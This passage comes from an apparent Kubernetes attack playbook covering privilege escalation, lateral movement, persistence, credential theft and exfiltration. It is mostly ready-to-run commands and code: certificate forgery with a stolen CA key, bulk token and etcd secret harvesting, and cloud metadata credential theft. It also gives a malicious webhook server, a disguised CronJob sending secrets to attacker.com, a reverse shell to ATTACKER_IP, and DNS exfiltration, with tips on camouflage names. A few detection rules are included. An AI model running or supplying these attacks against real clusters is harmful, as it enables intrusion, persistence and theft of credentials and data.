kubectl auth can-i update certificatesigningrequests/approval

# Generate a key and CSR for a privileged identity
openssl genrsa -out attacker.key 2048
openssl req -new -key attacker.key -out attacker.csr \
  -subj "/O=system:masters/CN=attacker"  # system:masters group = cluster-admin

# Submit CSR to Kubernetes
cat <<EOF | kubectl apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: attacker-csr
spec:
  request: $(cat attacker.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages:
  - client auth
EOF

# Approve the CSR (if you have approval permissions)
kubectl certificate approve attacker-csr

# Extract the signed certificate
kubectl get csr attacker-csr -o jsonpath='{.status.certificate}' | base64 -d > attacker.crt

# Use the certificate for cluster-admin access
kubectl --client-certificate=attacker.crt --client-key=attacker.key \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  --server=https://kubernetes.default.svc auth can-i --list
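The identity the API server will mint from that CSR is visible locally before it is ever submitted; a quick offline dry run (throwaway files under /tmp):

```shell
# Generate the key and CSR exactly as above
openssl genrsa -out /tmp/attacker.key 2048 2>/dev/null
openssl req -new -key /tmp/attacker.key -out /tmp/attacker.csr \
  -subj "/O=system:masters/CN=attacker"

# Inspect the subject: client-cert auth maps O= to groups and CN= to the
# username, so this cert authenticates as user "attacker" in system:masters
openssl req -in /tmp/attacker.csr -noout -subject
```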

4.7 Node-to-Cluster Pivoting

# Once you have root on a node, escalate to cluster-admin:

# 1. Steal kubelet client certificate (authenticates as system:node:NODE_NAME)
cat /var/lib/kubelet/pki/kubelet-client-current.pem

# 2. On control-plane nodes: steal admin kubeconfig
cat /etc/kubernetes/admin.conf

# 3. On control-plane nodes: steal CA key for certificate forgery
cat /etc/kubernetes/pki/ca.key
cat /etc/kubernetes/pki/ca.crt

# Forge any certificate with the CA key:
openssl genrsa -out forged.key 2048
openssl req -new -key forged.key -out forged.csr -subj "/O=system:masters/CN=forged-admin"
openssl x509 -req -in forged.csr -CA /etc/kubernetes/pki/ca.crt \
  -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial \
  -out forged.crt -days 365

# 4. Extract etcd credentials for direct etcd access
cat /etc/kubernetes/pki/etcd/peer.crt
cat /etc/kubernetes/pki/etcd/peer.key

# 5. Harvest all SA tokens from kubelet pod volumes
find /var/lib/kubelet/pods/ -name token -type l | while read f; do
  echo "=== $f ==="
  cat "$f" 2>/dev/null
done

4.8 Service Account Token Theft

# Default mount point in every pod (unless automount disabled)
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Decode JWT payload to see identity and expiry
# (base64 -d needs '=' padding when the segment length isn't a multiple of 4)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

# Use the token
export APISERVER=https://kubernetes.default.svc
curl -k -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces

# kubectl shorthand
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify auth can-i --list

# From host: harvest all tokens on node
# (point kubectl --server at the API server if the node has no kubeconfig)
find /var/lib/kubelet/pods/ -name token -type l 2>/dev/null | while read tp; do
  tok=$(cat "$tp" 2>/dev/null)
  if [ -n "$tok" ]; then
    sub=$(echo "$tok" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -c \
      "import sys,json;d=json.load(sys.stdin);print(d.get('sub','?'))" 2>/dev/null)
    perms=$(kubectl --token="$tok" auth can-i --list 2>/dev/null | grep -c '\*')
    echo "$sub | wildcards=$perms | $tp"
  fi
done
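The `base64 -d` step above fails whenever a JWT segment's length is not a multiple of 4, because base64url encoding drops the `=` padding. A minimal padding-aware decoder:

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    """Decode the payload segment of a JWT without verifying the signature.
    base64url payloads omit '=' padding, so restore it before decoding."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))
```

Feed it the raw token from `/var/run/secrets/kubernetes.io/serviceaccount/token` to read the `sub`, `exp`, and `aud` claims regardless of padding.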

4.9 Dangerous RBAC Permissions Reference

Permission -- Escalation Path
create pods -- Mount host filesystem, use privileged SA, escape to node
create deployments/daemonsets/jobs -- Same as create pods (indirect pod creation)
create/update clusterrolebindings -- Bind cluster-admin to self
create/update clusterroles + escalate -- Create god-mode role
get secrets (cluster-wide) -- Read all SA tokens, TLS certs, credentials
create serviceaccounts/token -- Mint tokens for any SA
impersonate users/groups -- Act as cluster-admin
create certificatesigningrequests + approve -- Forge client certificates
update/patch nodes -- Modify node labels to attract sensitive workloads
create/update validatingwebhookconfigurations -- Disable security admission
create/update mutatingwebhookconfigurations -- Inject sidecars into all pods
delete events -- Cover tracks by removing audit evidence

Detection -- Sigma Rule: ClusterRoleBinding Creation:

title: Kubernetes ClusterRoleBinding to cluster-admin Created
id: f8e2d3a1-b4c5-4d6e-8f9a-0b1c2d3e4f5a
status: experimental
description: Detects creation of ClusterRoleBinding referencing cluster-admin role
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: clusterrolebindings
  privilege:
    requestObject.roleRef.name: cluster-admin
  condition: selection and privilege
falsepositives:
  - Legitimate cluster setup or operator installation
  - Helm chart deployments that require cluster-admin
level: critical
tags:
  - attack.t1098.006
  - attack.privilege_escalation

5. Lateral Movement

5.1 Pod-to-Pod via Network Policy Gaps

ATT&CK: T1046 (Network Service Discovery), T1021 (Remote Services)

# Default Kubernetes networking: ALL pods can communicate with ALL other pods
# Check for network policies
kubectl get networkpolicies -A
# If empty -- no restrictions, full lateral movement possible

# Service discovery via DNS
# List all services in all namespaces
nslookup -type=SRV _http._tcp.default.svc.cluster.local
dig +short SRV "*.*.svc.cluster.local"  # quote the wildcard so the shell doesn't glob it

# Enumerate services via environment variables (legacy)
env | grep -i _SERVICE_HOST
env | grep -i _SERVICE_PORT

# Enumerate via DNS brute-force
for ns in default kube-system monitoring logging; do
  for svc in api web db redis postgres mysql elasticsearch kibana grafana prometheus; do
    result=$(nslookup $svc.$ns.svc.cluster.local 2>/dev/null | grep Address | tail -1)
    [ -n "$result" ] && echo "$svc.$ns: $result"
  done
done
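The brute-force loop above can also be expressed as a small resolver sketch; the candidate names are illustrative guesses, not a fixed list:

```python
import socket

# Hypothetical candidate list -- adjust namespaces/services to the target
CANDIDATES = [
    f"{svc}.{ns}.svc.cluster.local"
    for ns in ("default", "kube-system", "monitoring")
    for svc in ("api", "db", "redis", "grafana", "prometheus")
]

def discover(names):
    """Return {name: first resolved address} for every name that resolves."""
    found = {}
    for name in names:
        try:
            found[name] = socket.getaddrinfo(name, None)[0][4][0]
        except socket.gaierror:
            pass  # NXDOMAIN -- skip
    return found
```

Run `discover(CANDIDATES)` from inside a pod, where the cluster DNS suffix resolves.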

# Port scan discovered pods
# Get pod CIDR
kubectl get nodes -o jsonpath='{.items[*].spec.podCIDR}'
# Scan
nmap -sT -p 80,443,3306,5432,6379,8080,8443,9200,27017 [POD_CIDR]

# Reach any service directly (bypassing ingress controls)
curl http://10.244.1.15:8080/admin
curl http://internal-api.production.svc.cluster.local/v1/users

5.2 Service Account Hopping

# If you can exec into pods or access the kubelet API,
# you can steal SA tokens from other pods and pivot

# Via kubelet API (if anonymous auth enabled)
curl -k https://[NODE_IP]:10250/runningpods/ | jq '.items[].metadata.name'

# Exec into another pod and steal its token
curl -k -X POST "https://[NODE_IP]:10250/run/production/api-server-xyz/api" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

# Via kubectl (if you have exec permissions in target namespace)
kubectl exec -n production api-server-xyz -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Test stolen token privileges
STOLEN_TOKEN="eyJhbG..."
kubectl --token=$STOLEN_TOKEN auth can-i --list
kubectl --token=$STOLEN_TOKEN get secrets -n production

5.3 etcd Direct Access

# If you can reach etcd (from compromised control-plane node or network access)
# etcd contains ALL cluster state -- secrets, configs, RBAC, everything

# Check connectivity
curl -k https://[ETCD_IP]:2379/version

# With etcd certificates (from control-plane node):
ETCDCTL_API=3 etcdctl \
  --endpoints=https://[ETCD_IP]:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  get / --prefix --keys-only | head -50

# Dump all secrets
ETCDCTL_API=3 etcdctl \
  --endpoints=https://[ETCD_IP]:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  get /registry/secrets --prefix

# Extract SA tokens from etcd database file (no etcdctl needed)
strings /var/lib/etcd/member/snap/db | grep eyJhbGciOiJ

# Targeted secret extraction
ETCDCTL_API=3 etcdctl get /registry/secrets/kube-system/[SECRET_NAME] \
  --endpoints=https://[ETCD_IP]:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt

# Write to etcd (create a cluster-admin binding directly)
# This bypasses ALL admission controllers and RBAC checks
ETCDCTL_API=3 etcdctl put /registry/clusterrolebindings/pwned \
  '[serialized ClusterRoleBinding protobuf]' \
  --endpoints=https://[ETCD_IP]:2379 ...
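Keys in a `--keys-only` dump follow `/registry/<resource>/<namespace>/<name>`, with cluster-scoped objects omitting the namespace (and some API groups inserting an extra group segment, which this rough heuristic does not handle):

```python
def parse_registry_key(key: str):
    """Split an etcd registry key into (resource, namespace, name).
    Rough heuristic: 3 path parts = cluster-scoped, 4 = namespaced."""
    parts = key.strip("/").split("/")
    if not parts or parts[0] != "registry":
        raise ValueError(f"not a registry key: {key!r}")
    if len(parts) == 4:
        return parts[1], parts[2], parts[3]
    if len(parts) == 3:
        return parts[1], None, parts[2]
    raise ValueError(f"unrecognised key layout: {key!r}")
```

Useful for triaging a large key dump into per-namespace secret targets before pulling values.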

5.4 Cloud Metadata from Pods

# AWS IMDSv1 (no authentication required)
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

# AWS IMDSv2 (requires token -- still accessible from pods unless blocked)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP metadata
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/project/project-id
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

# Azure IMDS
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Use stolen cloud credentials to access other services
# AWS: use AccessKeyId/SecretAccessKey/Token for S3, EC2, IAM
# GCP: use access_token for GCS, Compute, IAM
# Azure: use access_token for ARM, Key Vault, Storage

5.5 CoreDNS Poisoning

# If you can modify the CoreDNS ConfigMap:
kubectl -n kube-system get configmap coredns -o yaml

# Edit to add rewrite rules
kubectl -n kube-system edit configmap coredns
# Add under the Corefile section:
#   rewrite name api.production.svc.cluster.local attacker-pod.default.svc.cluster.local

# Or add a custom zone file for MITM:
# file /etc/coredns/custom.db example.com {
#   reload 10s
# }

# Restart CoreDNS to apply
kubectl -n kube-system rollout restart deployment coredns

5.6 ARP Spoofing from hostNetwork Pod

# From a pod with hostNetwork: true
apt update && apt install -y dsniff tcpdump

# ARP spoof to intercept traffic between pods
arpspoof -i eth0 -t [TARGET_POD_IP] [GATEWAY_IP]
arpspoof -i eth0 -t [GATEWAY_IP] [TARGET_POD_IP]

# Capture intercepted traffic
tcpdump -ni eth0 -s0 -w captured.pcap
# Look for bearer tokens, API keys, database credentials
tcpdump -ni eth0 -s0 -A | grep -i "authorization\|bearer\|password\|token"

5.7 Kubelet API for Cross-Pod Execution

# Kubelet API allows exec into ANY pod on the node
# Ports: 10250 (authenticated), 10255 (read-only, deprecated)

# List all pods on the node
curl -k https://[NODE_IP]:10250/pods | jq '.items[].metadata | {name, namespace}'

# Execute commands in any pod
curl -k -X POST "https://[NODE_IP]:10250/run/[NS]/[POD]/[CONTAINER]" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

# Get container logs
curl -k "https://[NODE_IP]:10250/containerLogs/[NS]/[POD]/[CONTAINER]?tail=100"

# Websocket exec (for interactive shells)
wscat -c "wss://[NODE_IP]:10250/exec/[NS]/[POD]/[CONTAINER]?command=/bin/sh&input=1&output=1&tty=1" \
  --no-check

6. Persistence

6.1 Admission Webhook Backdoors

ATT&CK: T1098 (Account Manipulation), T1546 (Event Triggered Execution)

Mutating admission webhooks intercept every API request and can modify objects before they are persisted. A malicious webhook can inject sidecars, modify security contexts, or exfiltrate data from every created resource.

# Malicious MutatingWebhookConfiguration
# Injects a sidecar into every new pod
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: pod-injector
webhooks:
- name: inject.attacker.io
  admissionReviewVersions: ["v1"]
  sideEffects: None
  clientConfig:
    url: "https://attacker-webhook.default.svc:443/mutate"
    # OR for external:
    # url: "https://attacker.com/webhook/mutate"
  rules:
  - operations: ["CREATE"]
    apiGroups: [""]
    apiVersions: ["v1"]
    resources: ["pods"]
  namespaceSelector:
    matchExpressions:
    - key: kubernetes.io/metadata.name
      operator: NotIn
      values: ["kube-system"]  # Avoid breaking system pods
  failurePolicy: Ignore  # Fail open so webhook outage doesn't block cluster
# Webhook server that injects a sidecar into every pod
# This is the server that runs at attacker-webhook.default.svc
from flask import Flask, request, jsonify
import base64, json

app = Flask(__name__)

@app.route('/mutate', methods=['POST'])
def mutate():
    review = request.get_json()
    pod = review['request']['object']

    # Inject sidecar container
    sidecar = {
        "name": "monitoring-agent",  # Innocent-looking name
        "image": "attacker/exfil:latest",
        "env": [{"name": "TARGET_TOKEN", "value": ""}],
        "volumeMounts": [{
            # assumes a matching "sa-token" volume is also patched into the
            # pod spec (or rename to the pod's existing kube-api-access volume)
            "name": "sa-token",
            "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
            "readOnly": True
        }],
        "resources": {"limits": {"cpu": "50m", "memory": "64Mi"}}
    }

    patch = [{"op": "add", "path": "/spec/containers/-", "value": sidecar}]

    return jsonify({
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": review['request']['uid'],
            "allowed": True,
            "patchType": "JSONPatch",
            "patch": base64.b64encode(json.dumps(patch).encode()).decode()
        }
    })

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))
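The `patch` field in the response must be the base64 of a JSON Patch array. A quick way to sanity-check that encoding without standing up Flask -- this helper mirrors what the mutate() handler above emits:

```python
import base64
import json

def admission_response(uid: str, patch_ops: list) -> dict:
    """Build an AdmissionReview response carrying a base64-encoded JSONPatch."""
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": uid,
            "allowed": True,
            "patchType": "JSONPatch",
            "patch": base64.b64encode(json.dumps(patch_ops).encode()).decode(),
        },
    }
```

If the API server silently ignores your mutation, decoding the `patch` field back and comparing it against the intended operations is the first debugging step.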

Detection -- Falco Rule:

- rule: Mutating Webhook Configuration Modified
  desc: Detect creation or modification of mutating webhook configurations
  condition: >
    kevt and
    (kcreate or kupdate) and
    ka.target.resource = "mutatingwebhookconfigurations"
  output: >
    Mutating webhook configuration changed
    (user=%ka.user.name verb=%ka.verb name=%ka.target.name)
  priority: HIGH
  tags: [k8s, persistence, T1098]

6.2 CronJob Persistence

ATT&CK: T1053.007 (Container Orchestration Job)

# CronJob that runs every 5 minutes, exfiltrates secrets
apiVersion: batch/v1
kind: CronJob
metadata:
  name: log-rotation  # Innocent name
  namespace: kube-system
spec:
  schedule: "*/5 * * * *"
  successfulJobsHistoryLimit: 0  # Don't keep completed job records
  failedJobsHistoryLimit: 0
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: default
          containers:
          - name: rotate
            image: curlimages/curl
            command:
            - /bin/sh
            - -c
            - |
              TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
              SECRETS=$(curl -sk -H "Authorization: Bearer $TOKEN" \
                https://kubernetes.default.svc/api/v1/secrets)
              curl -X POST https://attacker.com/exfil -d "$SECRETS"
          restartPolicy: Never
# Create the CronJob
kubectl apply -f cronjob-persistence.yaml

# Verify it's running
kubectl get cronjobs -n kube-system
kubectl get jobs -n kube-system

# Stealthy: name it like a legitimate job
# Good camouflage names: log-rotation, cert-renewal, metrics-collector, cache-cleaner

6.3 Static Pod Injection

ATT&CK: T1543.005 (Container Service)

Static pods are managed directly by the kubelet, not the API server. They bypass ALL admission controllers.

# Requires write access to the kubelet's static pod manifest directory
# Default: /etc/kubernetes/manifests/

# Create a static pod backdoor
cat > /etc/kubernetes/manifests/kube-metrics-collector.yaml << 'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: kube-metrics-collector
  namespace: kube-system
  labels:
    component: metrics
    tier: monitoring
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: collector
    image: ubuntu:22.04
    command:
    - bash
    - -c
    - |
      while true; do
        # Reverse shell beacon
        bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 || true
        sleep 300
      done
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostroot
  volumes:
  - name: hostroot
    hostPath:
      path: /
EOF

# kubelet automatically creates this pod
# It survives kubectl delete (kubelet recreates it immediately)
# Only removable by deleting the manifest file from the node

Key properties of static pods:

  • Not managed by API server (no Deployment/ReplicaSet)
  • Bypass admission controllers (OPA, Kyverno, Pod Security)
  • Survive kubectl delete (kubelet recreates them)
  • Visible in API as mirror pods but cannot be modified via API
  • Only removed by deleting the manifest file on the node
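Because the kubelet reports each static pod to the API server as a mirror pod carrying the `kubernetes.io/config.mirror` annotation, a hunt for this persistence technique can filter pod objects on that annotation:

```python
def is_mirror_pod(pod: dict) -> bool:
    """True if the pod object is the API-server mirror of a static pod.
    The kubelet stamps mirror pods with the kubernetes.io/config.mirror
    annotation (its value is a hash of the on-disk manifest)."""
    annotations = pod.get("metadata", {}).get("annotations", {})
    return "kubernetes.io/config.mirror" in annotations
```

Pipe `kubectl get pods -A -o json` through this filter and review any mirror pod that is not a known control-plane component.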

6.4 DaemonSet Backdoor

# DaemonSet runs on EVERY node -- one pod per node for full coverage
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-monitor  # Camouflage name
  namespace: kube-system
  labels:
    k8s-app: node-monitor
spec:
  selector:
    matchLabels:
      k8s-app: node-monitor
  template:
    metadata:
      labels:
        k8s-app: node-monitor
    spec:
      hostNetwork: true
      hostPID: true
      tolerations:
      - operator: Exists  # Run on ALL nodes including masters
      containers:
      - name: monitor
        image: ubuntu:22.04
        command: ["bash", "-c", "while true; do sleep 3600; done"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: root
      volumes:
      - name: root
        hostPath:
          path: /

6.5 Mutating Webhook for Persistent Injection

# Webhook that modifies EVERY deployment to include a backdoor init container
# This persists even if you delete individual pods -- new ones get re-infected
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: cert-injector  # Disguised as certificate injection
webhooks:
- name: certs.internal.io
  admissionReviewVersions: ["v1"]
  sideEffects: None
  clientConfig:
    service:
      name: cert-injector
      namespace: kube-system
      path: /inject
  rules:
  - operations: ["CREATE", "UPDATE"]
    apiGroups: ["apps"]
    apiVersions: ["v1"]
    resources: ["deployments", "daemonsets", "statefulsets"]
  failurePolicy: Ignore

6.6 Container Image Backdoor

# Modify an existing image in the registry to include a backdoor

# Pull the legitimate image
docker pull registry.internal.com/app:v2.1.0

# Add backdoor layer
cat > Dockerfile.backdoor << 'EOF'
FROM registry.internal.com/app:v2.1.0
COPY backdoor.sh /usr/local/bin/.health-check
RUN chmod +x /usr/local/bin/.health-check
# Modify entrypoint to run backdoor in background
ENTRYPOINT ["/bin/sh", "-c", "/usr/local/bin/.health-check & exec /original-entrypoint"]
EOF

# Push with the same tag
docker build -f Dockerfile.backdoor -t registry.internal.com/app:v2.1.0 .
docker push registry.internal.com/app:v2.1.0

# Next restart or scale event pulls the backdoored image

6.7 Shadow API Server

# CDK tool can deploy a shadow API server
cdk run k8s-shadow-apiserver

# Manual: create a pod that serves as a secondary API endpoint
# that accepts any authentication and proxies to the real API server
# with a stolen high-privilege token

7. Credential Access

7.1 Secrets via Kubernetes API

ATT&CK: T1528 (Steal Application Access Token)

# List all secrets (requires get secrets permission)
kubectl get secrets -A
kubectl get secrets -A -o json

# Decode secrets
kubectl get secret [NAME] -n [NS] -o jsonpath='{.data}' | \
  python3 -c "import sys,json,base64; [print(f'{k}: {base64.b64decode(v).decode()}') for k,v in json.loads(sys.stdin.read()).items()]"

# Bulk extraction script
kubectl get secrets -A -o json | python3 -c "
import json,sys,base64
data = json.load(sys.stdin)
for item in data['items']:
  ns = item['metadata']['namespace']
  name = item['metadata']['name']
  kind = item.get('type','')
  print(f'=== {ns}/{name} ({kind}) ===')
  for k,v in item.get('data',{}).items():
    try: print(f'  {k}: {base64.b64decode(v).decode()[:200]}')
    except: print(f'  {k}: [binary data]')
"

# Target high-value secrets
kubectl get secrets -A -o json | jq '
  .items[] | select(
    .type == "kubernetes.io/tls" or
    .type == "Opaque" or
    .type == "kubernetes.io/dockerconfigjson"
  ) | {namespace: .metadata.namespace, name: .metadata.name, type: .type}'

7.2 Secrets in etcd

# Direct etcd access bypasses RBAC entirely

# Check encryption at rest
cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep encryption-provider-config
cat /etc/kubernetes/encryption-config.yaml

# If using identity provider (NOT encrypted):
# providers:
# - identity: {}    <-- secrets stored in plaintext

# Dump all secrets from etcd
ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  get /registry/secrets --prefix --print-value-only

# From etcd database file (offline, no etcdctl)
strings /var/lib/etcd/member/snap/db | grep -A5 "password\|secret\|token"

7.3 Mounted Secrets in Pods

# Secrets mounted as volumes
find / -name "*.key" -o -name "*.pem" -o -name "*.crt" 2>/dev/null
find / -path "*/secrets/*" 2>/dev/null
find / -path "*/.dockerconfigjson" 2>/dev/null

# Secrets as environment variables (visible in /proc)
env | grep -iE "password|secret|key|token|api_key|credential"
cat /proc/self/environ | tr '\0' '\n' | grep -iE "password|secret|key|token"

# From host with hostPID: steal env vars from all pods
for e in /proc/*/environ; do
  xargs -0 -L1 -a "$e" 2>/dev/null | grep -iE "password|secret|key|token|aws"
done
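The same harvest can be done with a parser for the NUL-separated KEY=VALUE blobs in /proc/&lt;pid&gt;/environ; the filter pattern below is one illustrative choice:

```python
import re

CRED_PATTERN = re.compile(r"password|secret|token|key|credential|aws", re.I)

def credential_vars(environ_blob: bytes) -> dict:
    """Parse a /proc/<pid>/environ blob (NUL-separated KEY=VALUE entries)
    and keep only variables whose name looks credential-bearing."""
    out = {}
    for entry in environ_blob.split(b"\0"):
        if b"=" not in entry:
            continue
        key, _, value = entry.partition(b"=")
        if CRED_PATTERN.search(key.decode(errors="replace")):
            out[key.decode(errors="replace")] = value.decode(errors="replace")
    return out
```

On a host with hostPID, loop over `/proc/*/environ`, read each blob, and merge the results.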

7.4 Cloud IMDS Credential Theft

# AWS -- node IAM role credentials
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
CREDS=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE)
echo $CREDS | jq '{AccessKeyId, SecretAccessKey, Token, Expiration}'

# Use stolen AWS credentials
export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .Token)
aws sts get-caller-identity
aws s3 ls
aws ec2 describe-instances
aws iam list-roles

# GCP -- default service account token
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token \
  | jq -r .access_token)
# Use with gcloud or API calls
curl -H "Authorization: Bearer $TOKEN" \
  "https://www.googleapis.com/storage/v1/b?project=$(curl -s -H 'Metadata-Flavor: Google' \
  http://metadata.google.internal/computeMetadata/v1/project/project-id)"

# Azure -- managed identity token
TOKEN=$(curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
  | jq -r .access_token)
# Use with az CLI or REST API
curl -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions?api-version=2020-01-01"

7.5 IRSA / Workload Identity Abuse

# AWS IRSA (IAM Roles for Service Accounts)
# Pods get a projected SA token that can be exchanged for AWS credentials

# Check if IRSA is configured
env | grep AWS_ROLE_ARN
env | grep AWS_WEB_IDENTITY_TOKEN_FILE
cat $AWS_WEB_IDENTITY_TOKEN_FILE

# The token is a K8s SA token with an audience claim for STS
# AWS STS trusts the K8s OIDC provider to issue tokens for this role
# Attack: if you can create pods with the annotated service account,
# you get the AWS IAM role

# Check SA annotations
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["eks.amazonaws.com/role-arn"] != null) |
  {namespace: .metadata.namespace, name: .metadata.name,
   role: .metadata.annotations["eks.amazonaws.com/role-arn"]}'

# Create a pod with the target SA to steal AWS credentials
# (--serviceaccount was removed from kubectl run; use --overrides on recent clients)
kubectl run steal --image=amazonlinux -n target-ns \
  --overrides='{"spec":{"serviceAccountName":"target-sa"}}' \
  --command -- sleep infinity
kubectl exec -it steal -n target-ns -- aws sts get-caller-identity

# GCP Workload Identity
# Check for WI annotation
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["iam.gke.io/gcp-service-account"] != null) |
  {namespace: .metadata.namespace, name: .metadata.name,
   gsa: .metadata.annotations["iam.gke.io/gcp-service-account"]}'

# Azure Workload Identity (AAD Pod Identity)
kubectl get azureidentities -A
kubectl get azureidentitybindings -A

7.6 Container Image Layer Secrets

# Secrets may be baked into image layers
docker history [IMAGE] --no-trunc
docker inspect [IMAGE] | jq '.[].Config.Env'

# Extract and search all layers
docker save [IMAGE] -o image.tar
tar xf image.tar
for layer in */layer.tar; do
  echo "=== $layer ==="
  tar tf "$layer" 2>/dev/null | grep -iE "\.env|\.key|\.pem|config|secret|password|credential"
done

# Search layer contents
for layer in */layer.tar; do
  mkdir -p /tmp/layer_extract
  tar xf "$layer" -C /tmp/layer_extract 2>/dev/null
  grep -rl "password\|secret\|api_key\|token" /tmp/layer_extract/ 2>/dev/null
  rm -rf /tmp/layer_extract
done

8. Data Exfiltration

8.1 Volume Mount Access

ATT&CK: T1005 (Data from Local System)

# If a pod has PersistentVolume mounts, access data directly
df -h  # List mounted volumes
ls -la /data /mnt /vol /persistent 2>/dev/null

# From a hostPath pod: access ALL PersistentVolumes on the node
find /host/var/lib/kubelet/pods -name "*.json" -path "*/volumes/*" 2>/dev/null
ls /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~*/ 2>/dev/null

# Access NFS/EBS/GCE PD volumes
mount | grep -E "nfs|ebs|gce|azure"

# Copy data from PV to exfil
tar czf /tmp/exfil.tar.gz /data/
curl -X POST -F "file=@/tmp/exfil.tar.gz" https://attacker.com/upload

8.2 Sidecar Injection for Data Capture

# Inject a sidecar that mirrors application traffic
# Via mutating webhook or direct pod spec modification
apiVersion: v1
kind: Pod
metadata:
  name: app-with-exfil
spec:
  containers:
  - name: app
    image: myapp:latest
    ports:
    - containerPort: 8080
  - name: log-agent  # Disguised sidecar
    image: attacker/exfil-agent:latest
    env:
    - name: EXFIL_ENDPOINT
      value: "https://attacker.com/collect"
    volumeMounts:
    - name: shared-data
      mountPath: /app-data
    - name: sa-token
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      readOnly: true
  volumes:
  - name: shared-data
    emptyDir: {}
  - name: sa-token
    projected:
      sources:
      - serviceAccountToken:
          path: token

8.3 DNS Exfiltration

# Encode data into DNS queries -- bypasses most network policies
# NetworkPolicy does not filter DNS traffic to CoreDNS by default

# Simple DNS exfil
data=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 | tr '+/' '-_' | tr -d '=' | fold -w 60)
for chunk in $data; do
  nslookup $chunk.exfil.attacker.com
done
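A chunker sketch for the encoding step: base32 survives resolvers that case-fold queries (base64url does not), and each label must stay within DNS's 63-octet limit:

```python
import base64

def to_labels(data: bytes, max_label: int = 63) -> list:
    """Encode bytes as DNS-safe labels using lowercase base32
    (case-insensitive, so safe against query case randomisation)."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    return [encoded[i:i + max_label] for i in range(0, len(encoded), max_label)]

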